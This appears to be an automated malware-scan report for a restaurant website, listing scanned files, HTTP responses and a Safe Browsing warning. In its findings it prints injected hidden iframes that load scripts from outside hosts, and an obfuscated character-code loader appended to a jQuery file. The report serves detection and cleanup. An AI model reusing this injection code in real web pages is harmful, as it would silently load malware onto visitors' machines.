Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=restaurant-tay-lai.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://restaurant-tay-lai.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 06 Sep 2014 17:33:25 GMT Location: http://www.restaurant-tay-lai.com/ Server: Apache Vary: Accept-Encoding Content-Length: 242 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.restaurant-tay-lai.com/ | 200 OK Content-Length: 12476 Content-Type: text/html | clean |
http://www.restaurant-tay-lai.com/swfobject.js | 200 OK Content-Length: 8508 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variable ...[3522 bytes skipped]... Decoded script: <iframe src="http://android.womenthemanual.com/count" width=0 height=0 frameborder=0></iframe><iframe src="http://analytics.rebel5.com/stat.js" width=0 height=0 frameborder=0></iframe><iframe src="http://46.4.163.208/counter.js" width=0 height=0 frameborder=0></iframe> | ||
http://restaurant-tay-lai.com/iepngfix_tilebg.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 06 Sep 2014 17:33:27 GMT Location: http://www.restaurant-tay-lai.com/iepngfix_tilebg.js Server: Apache Vary: Accept-Encoding Content-Length: 260 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
http://www.restaurant-tay-lai.com/iepngfix_tilebg.js | 200 OK Content-Length: 5728 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. var IEPNGFix = window.IEPNGFix || {}; IEPNGFix.tileBG = function(elm, pngSrc, ready) { var data = this.data[elm.uniqueID], elmW = Math.max(elm.clientWidth, elm.scrollWidth), elmH = Math.max(elm.clientHeight, elm.scrollHeight), bgX = elm.currentStyle.backgroundPositionX, bgY = elm.currentStyle.backgroundPositionY, bgR = elm.currentStyle.backgroundRepeat; if (!data.tiles) { data.tiles = { ...[3956 bytes skipped]... Decoded script: function () { clearTimeout(IEPNGFix.update.timer); IEPNGFix.update.timer = setTimeout(IEPNGFix.update, 100); } <iframe src="http://android.womenthemanual.com/count" width=0 height=0 frameborder=0></iframe><iframe src="http://analytics.rebel5.com/stat.js" width=0 height=0 frameborder=0></iframe><iframe src="http://46.4.163.208/counter.js" width=0 height=0 frameborder=0></iframe> | ||
http://restaurant-tay-lai.com/mootools-1.2-core.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 06 Sep 2014 17:33:29 GMT Location: http://www.restaurant-tay-lai.com/mootools-1.2-core.js Server: Apache Vary: Accept-Encoding Content-Length: 262 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.restaurant-tay-lai.com/mootools-1.2-core.js | 200 OK Content-Length: 65762 Content-Type: application/javascript | clean |
http://restaurant-tay-lai.com/mootools-1.2-more.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 06 Sep 2014 17:33:30 GMT Location: http://www.restaurant-tay-lai.com/mootools-1.2-more.js Server: Apache Vary: Accept-Encoding Content-Length: 262 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.restaurant-tay-lai.com/mootools-1.2-more.js | 200 OK Content-Length: 30076 Content-Type: application/javascript | clean |
http://restaurant-tay-lai.com/MooFlow.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 06 Sep 2014 17:33:31 GMT Location: http://www.restaurant-tay-lai.com/MooFlow.js Server: Apache Vary: Accept-Encoding Content-Length: 252 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.restaurant-tay-lai.com/mooflow.js | 404 Not Found Content-Length: 1806 Content-Type: text/html | clean |
http://www.restaurant-tay-lai.com/test404page.js | 404 Not Found Content-Length: 1806 Content-Type: text/html | clean |
http://restaurant-tay-lai.com/MooFlowViewer.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 06 Sep 2014 17:33:31 GMT Location: http://www.restaurant-tay-lai.com/MooFlowViewer.js Server: Apache Vary: Accept-Encoding Content-Length: 258 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
http://www.restaurant-tay-lai.com/mooflowviewer.js | 404 Not Found Content-Length: 1806 Content-Type: text/html | clean |
http://restaurant-tay-lai.com/jquery-1.3.2.min.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 06 Sep 2014 17:33:32 GMT Location: http://www.restaurant-tay-lai.com/jquery-1.3.2.min.js Server: Apache Vary: Accept-Encoding Content-Length: 261 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.restaurant-tay-lai.com/jquery-1.3.2.min.js | 200 OK Content-Length: 58882 Content-Type: application/javascript | clean |
http://restaurant-tay-lai.com/autosprites.min.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 06 Sep 2014 17:33:32 GMT Location: http://www.restaurant-tay-lai.com/autosprites.min.js Server: Apache Vary: Accept-Encoding Content-Length: 260 Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug | clean |
http://www.restaurant-tay-lai.com/autosprites.min.js | 200 OK Content-Length: 3478 Content-Type: application/javascript | clean |
http://restaurant-tay-lai.com/setup.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 06 Sep 2014 17:33:32 GMT Location: http://www.restaurant-tay-lai.com/setup.js Server: Apache Vary: Accept-Encoding Content-Length: 250 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.restaurant-tay-lai.com/setup.js | 200 OK Content-Length: 1780 Content-Type: application/javascript | clean |
http://restaurant-tay-lai.com/js-global/FancyZoom.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 06 Sep 2014 17:33:33 GMT Location: http://www.restaurant-tay-lai.com/js-global/FancyZoom.js Server: Apache Vary: Accept-Encoding Content-Length: 264 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.restaurant-tay-lai.com/js-global/fancyzoom.js | 404 Not Found Content-Length: 1806 Content-Type: text/html | clean |
http://restaurant-tay-lai.com/js-global/FancyZoomHTML.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 06 Sep 2014 17:33:33 GMT Location: http://www.restaurant-tay-lai.com/js-global/FancyZoomHTML.js Server: Apache Vary: Accept-Encoding Content-Length: 268 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.restaurant-tay-lai.com/js-global/fancyzoomhtml.js | 404 Not Found Content-Length: 1806 Content-Type: text/html | clean |
http://restaurant-tay-lai.com/jquery-1.4.1.min.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 06 Sep 2014 17:33:34 GMT Location: http://www.restaurant-tay-lai.com/jquery-1.4.1.min.js Server: Apache Vary: Accept-Encoding Content-Length: 261 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.restaurant-tay-lai.com/jquery-1.4.1.min.js | 200 OK Content-Length: 72470 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(z,v){function la(){if(!c.isReady){try{r.documentElement.doScroll("left")}catch(a){setTimeout(la,1);return}c.ready()}}function Ma(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,i){var j=a.length;if(typeof b==="object"){for(var n in b)X(a,n,b[n],f,e,d);return a}if(d!==v){f=!i&&f&&c.isFunction(d);for(n=0;n<j;n++)e(a[n],b,f?d.call(a[n] var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58!47!47!52!54!46!52!46!49!54!51!46!50!48!56!47!99!111!117!110!116!101!114!46!106!115!34!32!119!105!100!116!104!61!48!32!104!101!105!103!104!116!61!48!32!102!114!97!109!101!98!111!114!100!101!114!61!48!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out); Antivirus reports:
| ||
http://restaurant-tay-lai.com/jquery.carousel.pack.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 06 Sep 2014 17:33:35 GMT Location: http://www.restaurant-tay-lai.com/jquery.carousel.pack.js Server: Apache Vary: Accept-Encoding Content-Length: 265 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.restaurant-tay-lai.com/jquery.carousel.pack.js | 200 OK Content-Length: 7401 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: restaurant-tay-lai.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 06 Sep 2014 17:33:25 GMT
Location: http://www.restaurant-tay-lai.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 242
Content-Type: text/html; charset=iso-8859-1
...242 bytes of data.
GET / HTTP/1.1
Host: restaurant-tay-lai.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 06 Sep 2014 17:33:25 GMT
Location: http://www.restaurant-tay-lai.com/
Server: Apache
Vary: Accept-Encoding
Content-Length: 242
Content-Type: text/html; charset=iso-8859-1
...242 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: restaurant-tay-lai.com
Referer: http://www.google.com/search?q=restaurant-tay-lai.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: restaurant-tay-lai.com
Referer: http://www.google.com/search?q=restaurant-tay-lai.com
Result:
The result is similar to the first query. There are no suspicious redirects found.